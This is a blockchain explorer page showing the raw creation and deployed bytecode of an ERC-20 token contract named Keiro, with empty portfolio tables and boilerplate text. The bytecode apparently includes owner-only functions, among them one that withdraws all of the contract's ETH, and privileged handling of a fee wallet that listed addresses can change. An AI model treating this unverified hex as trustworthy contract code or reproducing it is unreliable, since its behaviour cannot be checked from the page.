4a565b60405180910390fd5b610368816108ca565b61046c610898565b600b5460ff16156104b95760405162461bcd60e51b81526020600482015260176024820152762a3930b234b7339034b99030b63932b0b23c9037b832b760491b6044820152606401610452565b6004546104ea9030906001600160a01b03166104d76009600a611094565b6104e590633b9aca006110a3565b6107af565b600480546040805163c45a015560e01b815290516001600160a01b039092169263c45a01559282820192602092908290030181865afa158015610531573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061055591906110ba565b6001600160a01b031663c9c6539630600460009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156105b7573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906105db91906110ba565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610628573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061064c91906110ba565b600b805462010000600160b01b031916620100006001600160a01b03938416021790556004541663f305d71947306106838161036b565b60008061068e6103d8565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af11580156106f6573d6000803e3d6000fd5b50505050506040513d601f19601f8201168201806040525081019061071b91906110d7565b5050600b805460ff1916600117908190556004805460405163095ea7b360e01b81526001600160a01b0391821692810192909252600019602483015262010000909204909116915063095ea7b3906044016020604051808303816000875af115801561078b573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906103689190611105565b6107bc838383600161091a565b505050565b60006107cd84846103f5565b9050600019811461080e57818110156107ff57828183604051637dc7a0d960e11b815260040161045293929190611127565b61080e8484848403600061091a565b50505050565b6001600160a01b03831661083e576000604051634b637e8f60e11b81526004016104529190610f4a565b6001600160a01b03821661086857600060405163ec442f0560e01b81526004016104529190610f4a565b6003546001600160a01b0316330361088d576003549192506001600160a01b03909116905b6107bc8383836109ef565b336108a16103d8565b6001600160a01b031614610398573360405163118cdaa760e01b81526004016104529190610f4a565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b03841661094457600060405163e602df0560e01b81526004016104529190610f4a565b6001600160a01b03831661096e576000604051634a1406b160e11b81526004016104529190610f4a565b6001600160a01b038085166000908152600260209081526040808320938716835292905220829055801561080e57826001600160a01b0316846001600160a01b03167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516109e191815260200190565b60405180910390a350505050565b60006109f96103d8565b6001600160a01b0316846001600160a01b031614158015610a335750610a1d6103d8565b6001600160a01b0316836001600160a01b031614155b8015610a4857506001600160a01b0384163014155b8015610a5d57506001600160a01b0383163014155b8015610a715750600b54610100900460ff16155b15610b2957600b546001600160a01b038581166201000090920416148015610aa757506004546001600160a01b03848116911614155b8015610acc57506001600160a01b03831660009081526005602052604090205460ff16155b8015610ae657506003546001600160a01b03848116911614155b15610b29576008546009541015610b2957606460065483610b0791906110a3565b610b119190611148565b600980549192506000610b238361116a565b91905055505b6001600160a01b03841660009081526001602052604090205482811015610b695784818460405163391434e360e21b815260040161045293929190611127565b6001600160a01b0385166000908152600160205260409020838203905582821115610bad5784818460405163391434e360e21b815260040161045293929190611127565b6001600160a01b0384166000908152600160205260408082208054858703019055308252902054610bdf908390611183565b30600081815260016020526040812092909255610bfb9061036b565b9050600a54811115610c1057610c1081610c8b565b47600b546001600160a01b03878116620100009092041603610c3557610c3547610e18565b856001600160a01b0316876001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87604051610c7a91815260200190565b60405180910390a350505050505050565b600b805461ff0019166101001790556040805160028082526060820183526000926020830190803683370190505090503081600081518110610ccf57610ccf611196565b60200260200101906001600160a01b031690816001600160a01b031681525050600460009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610d42573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610d6691906110ba565b81600181518110610d7957610d79611196565b6001600160a01b039283166020918202929092010152600454610d9f91309116846107af565b6004805460405163791ac94760e01b81526001600160a01b039091169163791ac94791610dd7918691600091879130914291016111ac565b600060405180830381600087803b158015610df157600080fd5b505af1158015610e05573d6000803e3d6000fd5b5050600b805461ff001916905550505050565b6003546040516001600160a01b039091169082156108fc029083906000818181858888f19350505050158015610e52573d6000803e3d6000fd5b5050565b602081526000825180602084015260005b81811015610e845760208186018101516040868401015201610e67565b506000604082850101526040601f19601f83011684010191505092915050565b6001600160a01b038116811461036857600080fd5b60008060408385031215610ecc57600080fd5b8235610ed781610ea4565b946020939093013593505050565b600080600060608486031215610efa57600080fd5b8335610f0581610ea4565b92506020840135610f1581610ea4565b929592945050506040919091013590565b600060208284031215610f3857600080fd5b8135610f4381610ea4565b9392505050565b6001600160a01b0391909116815260200190565b60008060408385031215610f7157600080fd5b8235610f7c81610ea4565b91506020830135610f8c81610ea4565b809150509250929050565b634e487b7160e01b600052601160045260246000fd5b6001815b6001841115610fe857808504811115610fcc57610fcc610f97565b6001841615610fda57908102905b60019390931c928002610fb1565b935093915050565b600082610fff575060016102dc565b8161100c575060006102dc565b8160018114611022576002811461102c57611048565b60019150506102dc565b60ff84111561103d5761103d610f97565b50506001821b6102dc565b5060208310610133831016604e8410600b841016171561106b575081810a6102dc565b6110786000198484610fad565b806000190482111561108c5761108c610f97565b029392505050565b6000610f4360ff841683610ff0565b80820281158282048414176102dc576102dc610f97565b6000602082840312156110cc57600080fd5b8151610f4381610ea4565b6000806000606084860312156110ec57600080fd5b5050815160208301516040909301519094929350919050565b60006020828403121561111757600080fd5b81518015158114610f4357600080fd5b6001600160a01b039390931683526020830191909152604082015260600190565b60008261116557634e487b7160e01b600052601260045260246000fd5b500490565b60006001820161117c5761117c610f97565b5060010190565b808201808211156102dc576102dc610f97565b634e487b7160e01b600052603260045260246000fd5b600060a0820187835286602084015260a0604084015280865180835260c08501915060208801925060005b818110156111fe5783516001600160a01b03168352602093840193909201916001016111d7565b50506001600160a01b03959095166060840152505060800152939250505056fea164736f6c634300081a000addf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef
Deployed Bytecode
0x6080604052600436106100bc5760003560e01c806306fdde03146100c8578063095ea7b31461010857806318160ddd1461013857806323b872dd1461015b578063313ce5671461017b578063593b14e71461019757806370a08231146101ae578063715018a6146101ce578063798e5036146101e35780638da5cb5b1461020357806395d89b4114610225578063a9059cbb14610253578063dd62ed3e14610273578063f2fde38b14610293578063fb201b1d146102b357600080fd5b366100c357005b600080fd5b3480156100d457600080fd5b506040805180820190915260058152644b6569726f60d81b60208201525b6040516100ff9190610e56565b60405180910390f35b34801561011457600080fd5b50610128610123366004610eb9565b6102c8565b60405190151581526020016100ff565b34801561014457600080fd5b5061014d6102e2565b6040519081526020016100ff565b34801561016757600080fd5b50610128610176366004610ee5565b610303565b34801561018757600080fd5b50604051600981526020016100ff565b3480156101a357600080fd5b506101ac610327565b005b3480156101ba57600080fd5b5061014d6101c9366004610f26565b61036b565b3480156101da57600080fd5b506101ac610386565b3480156101ef57600080fd5b506101ac6101fe366004610f26565b61039a565b34801561020f57600080fd5b506102186103d8565b6040516100ff9190610f4a565b34801561023157600080fd5b506040805180820190915260058152644b4549524f60d81b60208201526100f2565b34801561025f57600080fd5b5061012861026e366004610eb9565b6103e7565b34801561027f57600080fd5b5061014d61028e366004610f5e565b6103f5565b34801561029f57600080fd5b506101ac6102ae366004610f26565b610420565b3480156102bf57600080fd5b506101ac610464565b6000336102d68185856107af565b60019150505b92915050565b60006102f06009600a611094565b6102fe90633b9aca006110a3565b905090565b6000336103118582856107c1565b61031c858585610814565b506001949350505050565b61032f610898565b6000471161033c57600080fd5b60405133904780156108fc02916000818181858888f19350505050158015610368573d6000803e3d6000fd5b50565b6001600160a01b031660009081526001602052604090205490565b61038e610898565b61039860006108ca565b565b3360009081526005602052604090205460ff166103b657600080fd5b600380546001600160a01b0319166001600160a01b0392909216919091179055565b6000546001600160a01b031690565b6000336102d6818585610814565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b610428610898565b6001600160a01b03811661045b576000604051631e4fbdf760e01b81526004016104529190610f4a565b60405180910390fd5b610368816108ca565b61046c610898565b600b5460ff16156104b95760405162461bcd60e51b81526020600482015260176024820152762a3930b234b7339034b99030b63932b0b23c9037b832b760491b6044820152606401610452565b6004546104ea9030906001600160a01b03166104d76009600a611094565b6104e590633b9aca006110a3565b6107af565b600480546040805163c45a015560e01b815290516001600160a01b039092169263c45a01559282820192602092908290030181865afa158015610531573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061055591906110ba565b6001600160a01b031663c9c6539630600460009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156105b7573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906105db91906110ba565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610628573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061064c91906110ba565b600b805462010000600160b01b031916620100006001600160a01b03938416021790556004541663f305d71947306106838161036b565b60008061068e6103d8565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af11580156106f6573d6000803e3d6000fd5b50505050506040513d601f19601f8201168201806040525081019061071b91906110d7565b5050600b805460ff1916600117908190556004805460405163095ea7b360e01b81526001600160a01b0391821692810192909252600019602483015262010000909204909116915063095ea7b3906044016020604051808303816000875af115801561078b573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906103689190611105565b6107bc838383600161091a565b505050565b60006107cd84846103f5565b9050600019811461080e57818110156107ff57828183604051637dc7a0d960e11b815260040161045293929190611127565b61080e8484848403600061091a565b50505050565b6001600160a01b03831661083e576000604051634b637e8f60e11b81526004016104529190610f4a565b6001600160a01b03821661086857600060405163ec442f0560e01b81526004016104529190610f4a565b6003546001600160a01b0316330361088d576003549192506001600160a01b03909116905b6107bc8383836109ef565b336108a16103d8565b6001600160a01b031614610398573360405163118cdaa760e01b81526004016104529190610f4a565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b03841661094457600060405163e602df0560e01b81526004016104529190610f4a565b6001600160a01b03831661096e576000604051634a1406b160e11b81526004016104529190610f4a565b6001600160a01b038085166000908152600260209081526040808320938716835292905220829055801561080e57826001600160a01b0316846001600160a01b03167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516109e191815260200190565b60405180910390a350505050565b60006109f96103d8565b6001600160a01b0316846001600160a01b031614158015610a335750610a1d6103d8565b6001600160a01b0316836001600160a01b031614155b8015610a4857506001600160a01b0384163014155b8015610a5d57506001600160a01b0383163014155b8015610a715750600b54610100900460ff16155b15610b2957600b546001600160a01b038581166201000090920416148015610aa757506004546001600160a01b03848116911614155b8015610acc57506001600160a01b03831660009081526005602052604090205460ff16155b8015610ae657506003546001600160a01b03848116911614155b15610b29576008546009541015610b2957606460065483610b0791906110a3565b610b119190611148565b600980549192506000610b238361116a565b91905055505b6001600160a01b03841660009081526001602052604090205482811015610b695784818460405163391434e360e21b815260040161045293929190611127565b6001600160a01b0385166000908152600160205260409020838203905582821115610bad5784818460405163391434e360e21b815260040161045293929190611127565b6001600160a01b0384166000908152600160205260408082208054858703019055308252902054610bdf908390611183565b30600081815260016020526040812092909255610bfb9061036b565b9050600a54811115610c1057610c1081610c8b565b47600b546001600160a01b03878116620100009092041603610c3557610c3547610e18565b856001600160a01b0316876001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87604051610c7a91815260200190565b60405180910390a350505050505050565b600b805461ff0019166101001790556040805160028082526060820183526000926020830190803683370190505090503081600081518110610ccf57610ccf611196565b60200260200101906001600160a01b031690816001600160a01b031681525050600460009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610d42573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610d6691906110ba565b81600181518110610d7957610d79611196565b6001600160a01b039283166020918202929092010152600454610d9f91309116846107af565b6004805460405163791ac94760e01b81526001600160a01b039091169163791ac94791610dd7918691600091879130914291016111ac565b600060405180830381600087803b158015610df157600080fd5b505af1158015610e05573d6000803e3d6000fd5b5050600b805461ff001916905550505050565b6003546040516001600160a01b039091169082156108fc029083906000818181858888f19350505050158015610e52573d6000803e3d6000fd5b5050565b602081526000825180602084015260005b81811015610e845760208186018101516040868401015201610e67565b506000604082850101526040601f19601f83011684010191505092915050565b6001600160a01b038116811461036857600080fd5b60008060408385031215610ecc57600080fd5b8235610ed781610ea4565b946020939093013593505050565b600080600060608486031215610efa57600080fd5b8335610f0581610ea4565b92506020840135610f1581610ea4565b929592945050506040919091013590565b600060208284031215610f3857600080fd5b8135610f4381610ea4565b9392505050565b6001600160a01b0391909116815260200190565b60008060408385031215610f7157600080fd5b8235610f7c81610ea4565b91506020830135610f8c81610ea4565b809150509250929050565b634e487b7160e01b600052601160045260246000fd5b6001815b6001841115610fe857808504811115610fcc57610fcc610f97565b6001841615610fda57908102905b60019390931c928002610fb1565b935093915050565b600082610fff575060016102dc565b8161100c575060006102dc565b8160018114611022576002811461102c57611048565b60019150506102dc565b60ff84111561103d5761103d610f97565b50506001821b6102dc565b5060208310610133831016604e8410600b841016171561106b575081810a6102dc565b6110786000198484610fad565b806000190482111561108c5761108c610f97565b029392505050565b6000610f4360ff841683610ff0565b80820281158282048414176102dc576102dc610f97565b6000602082840312156110cc57600080fd5b8151610f4381610ea4565b6000806000606084860312156110ec57600080fd5b5050815160208301516040909301519094929350919050565b60006020828403121561111757600080fd5b81518015158114610f4357600080fd5b6001600160a01b039390931683526020830191909152604082015260600190565b60008261116557634e487b7160e01b600052601260045260246000fd5b500490565b60006001820161117c5761117c610f97565b5060010190565b808201808211156102dc576102dc610f97565b634e487b7160e01b600052603260045260246000fd5b600060a0820187835286602084015260a0604084015280865180835260c08501915060208801925060005b818110156111fe5783516001600160a01b03168352602093840193909201916001016111d7565b50506001600160a01b03959095166060840152505060800152939250505056fea164736f6c634300081a000a
Loading...
Loading
Loading...
Loading
Net Worth in USD
$0.00
Net Worth in ETH
0
Multichain Portfolio | 34 Chains
| Chain | Token | Portfolio % | Price | Amount | Value |
|---|
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.